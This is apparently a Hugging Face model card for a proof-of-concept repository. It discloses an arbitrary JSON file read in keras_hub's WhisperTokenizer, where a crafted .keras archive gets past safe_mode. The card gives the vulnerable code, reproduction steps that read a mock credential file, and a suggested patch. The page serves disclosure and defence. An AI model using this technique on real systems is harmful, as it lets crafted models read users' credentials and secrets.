Instructions to use VincHmann/keras-whisper-tokenizer-file-read-poc with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- Keras
How to use VincHmann/keras-whisper-tokenizer-file-read-poc with Keras:
# Available backend options are: "jax", "torch", "tensorflow". import os os.environ["KERAS_BACKEND"] = "jax" import keras model = keras.saving.load_model("hf://VincHmann/keras-whisper-tokenizer-file-read-poc") - KerasHub
How to use VincHmann/keras-whisper-tokenizer-file-read-poc with KerasHub:
import keras_hub # Create a Backbone model unspecialized for any task backbone = keras_hub.models.Backbone.from_preset("hf://VincHmann/keras-whisper-tokenizer-file-read-poc") - Keras
How to use VincHmann/keras-whisper-tokenizer-file-read-poc with Keras:
# Available backend options are: "jax", "torch", "tensorflow". import os os.environ["KERAS_BACKEND"] = "jax" import keras model = keras.saving.load_model("hf://VincHmann/keras-whisper-tokenizer-file-read-poc") - Notebooks
- Google Colab
- Kaggle
WhisperTokenizer Arbitrary JSON File Read via Crafted .keras Archive
Vulnerability: keras_hub.models.WhisperTokenizer reads an attacker-controlled
JSON file path from config.json during model deserialization with no safe mode guard.
Impact: Loading a crafted .keras file reads any JSON-formatted file accessible
to the process and exposes its content in model.language_tokens. safe_mode=True
does not protect this path.
CVE status: No CVE assigned. Distinct from CVE-2025-12058 and PR #2517.
PR #2517 patched BytePairTokenizer but WhisperTokenizer's _load_dict() helper
bypasses that guard.
Root cause
keras_hub/src/models/whisper/whisper_tokenizer.py:
def _load_dict(dict_or_path):
if isinstance(dict_or_path, str):
with open(dict_or_path, "r", encoding="utf-8") as f: # no in_safe_mode() check
dict_or_path = json.load(f)
return dict_or_path
Called from __init__():
if language_tokens is not None:
language_tokens = _load_dict(language_tokens) # fires if string path
Compare with the correctly patched BytePairTokenizer (PR #2517):
if isinstance(vocabulary, str):
if serialization_lib.in_safe_mode():
raise ValueError("Requested loading a vocabulary file outside model archive...")
with open(vocabulary, "r", encoding="utf-8") as f:
...
Additional bypass: vocabulary parameter
WhisperTokenizer.set_vocabulary_and_merges() also calls _load_dict(vocabulary)
BEFORE passing the result to the parent class. This converts a path string into a
dict, bypassing BytePairTokenizer's in_safe_mode() check entirely (which only
triggers when it receives a string, not a dict).
Affected versions
keras-hub 0.25.1 (PyPI) and later (WhisperTokenizer has been present since the initial keras-hub releases). Live-confirmed on 0.25.1.
Reproduction
Requirements:
pip install keras==3.12.1 keras-hub tensorflow
Step 1: Create the target file (simulates a GCP service account key, Docker config, or other JSON credentials):
echo '{"type":"service_account","project_id":"victim-proj","private_key_id":"abc123"}' > /tmp/whisper_poc_target.json
Step 2: Run the PoC:
import sys
from unittest.mock import MagicMock
sys.modules.setdefault("tensorflow_text", MagicMock())
import keras
import keras_hub # required: registers keras_hub>WhisperTokenizer
model = keras.models.load_model("malicious_whisper.keras", safe_mode=True)
print("model.language_tokens:", repr(model.language_tokens))
# Prints the parsed JSON content of /tmp/whisper_poc_target.json
Full self-contained PoC
See poc_whisper_file_read.py in this repo.
Suggested fix
Add in_safe_mode() checks in _load_dict() and set_vocabulary_and_merges():
from keras_hub.src.saving import serialization_lib
def _load_dict(dict_or_path):
if isinstance(dict_or_path, str):
if serialization_lib.in_safe_mode():
raise ValueError(
"Requested loading a file outside the model archive. "
"Pass safe_mode=False if you trust the source."
)
with open(dict_or_path, "r", encoding="utf-8") as f:
dict_or_path = json.load(f)
return dict_or_path
- Downloads last month
- 2